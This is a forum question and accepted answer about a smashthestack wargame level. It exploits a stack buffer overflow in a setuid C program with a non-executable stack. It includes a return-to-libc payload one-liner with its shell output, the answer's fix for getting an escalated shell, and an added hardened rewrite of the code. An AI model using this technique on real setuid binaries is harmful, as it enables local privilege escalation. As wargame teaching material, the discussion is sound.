BOF with non exec stack


I'm trying to pass level 2 of this "game" http://smashthestack.org/faq.html (connect via ssh to the blackbox server), which consists of a basic buffer overflow.

In the directory /home/level2 (there is a directory for each level with a file that contains the password for that level) there is an executable file called getowner, and its source code:

#include <stdio.h>
#include <string.h>   /* for strcpy() and strlen() */
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *filename;
    char buf[128];

    if((filename = getenv("filename")) == NULL) {
        printf("No filename configured!\n");
        return 1;
    }

    while(*filename == '/')
        filename++;
    strcpy(buf, "/tmp/");
    /* unbounded copy of attacker-controlled data into the 128-byte stack buffer */
    strcpy(&buf[strlen(buf)], filename);

    struct stat stbuf;
    stat(buf, &stbuf);   /* return value not checked; st_uid is garbage if stat fails */
    printf("The owner of this file is: %d\n", stbuf.st_uid);

    return 0;
}

The user that owns the executable file is level3:

level2@blackbox:~$ ls -lisa getowner
2370021 8 -rwsr-x--- 1 level3 gamers 7797 2017-05-24 01:56 getowner

So if I can exploit the buffer overflow and spawn a shell as level3, I can read the file /home/level3/password, get the password and win the level: am I right?

So:

1) I tried to upload shellcode in an environment variable and forge the filename variable to overwrite the return address on the stack so that it returns to the shellcode, but as you can see

level2@blackbox:~$ readelf -l getowner | grep GNU_STACK
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

code on the stack cannot be executed.

2) Then I tried to use the return-to-libc attack and call system("/bin/bash"), but in the spawned shell I'm still the level2 user :(

level2@blackbox:~$ export filename=$(perl -e 'print "a" x135;print "\xb0\x59\xee\xb7" ; print "\x20\xb4\xed\xb7" ; print "\x32\xfe\xff\xbf"')
level2@blackbox:~$ ./getowner 
The owner of this file is: -1207961948
bash-3.1$ id
uid=1003(level2) gid=1005(gamers) gruppi=1003(level2),1005(gamers)

Here 0xb7ee59b0 is the address of system(), 0xb7edb420 is the address of exit() and 0xbffffe32 is the address of the string /bin/bash.

Do I have other options, or am I mistaken?
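For comparison, here is a hardened version of the getowner logic above. This is an added example, not code from the original post or from the smashthestack game; the function names build_tmp_path and owner_of are my own. It replaces the unbounded strcpy pair with a length-checked snprintf, refuses names that would not fit in the 128-byte buffer, and checks the result of stat() instead of printing an uninitialised st_uid.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Build "/tmp/<name>" into out without ever writing past outsz.
 * Returns 0 on success, -1 if the result would have been truncated. */
int build_tmp_path(char *out, size_t outsz, const char *filename)
{
    while (*filename == '/')      /* strip leading slashes, as the original does */
        filename++;
    /* snprintf writes at most outsz-1 bytes plus NUL and reports the length it wanted */
    int n = snprintf(out, outsz, "/tmp/%s", filename);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz > 0)
            out[0] = '\0';
        return -1;                /* would not fit: reject instead of overflowing */
    }
    return 0;
}

/* Hardened replacement for the body of getowner's main().
 * Returns the owner uid of /tmp/<filename>, or -1 on any error. */
long owner_of(const char *filename)
{
    char buf[128];
    struct stat stbuf;
    if (build_tmp_path(buf, sizeof buf, filename) != 0)
        return -1;
    if (stat(buf, &stbuf) != 0)   /* the original ignored this and printed garbage */
        return -1;
    return (long)stbuf.st_uid;
}

int main(void)
{
    const char *filename = getenv("filename");
    if (filename == NULL) {
        printf("No filename configured!\n");
        return 1;
    }
    long uid = owner_of(filename);
    if (uid < 0) {
        printf("Cannot stat that file (name too long or missing)\n");
        return 1;
    }
    printf("The owner of this file is: %ld\n", uid);
    return 0;
}
```

With this version the 135-byte filename from the question is rejected before it reaches the buffer, so there is no return address to overwrite.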

spongebob (accepted answer):

Your second approach is correct, but you should use /bin/sh (or /bin/dash if /bin/sh is a symlink to /bin/bash).

One of the first things bash does is drop your euid privileges to your uid. See this stackexchange answer for more details.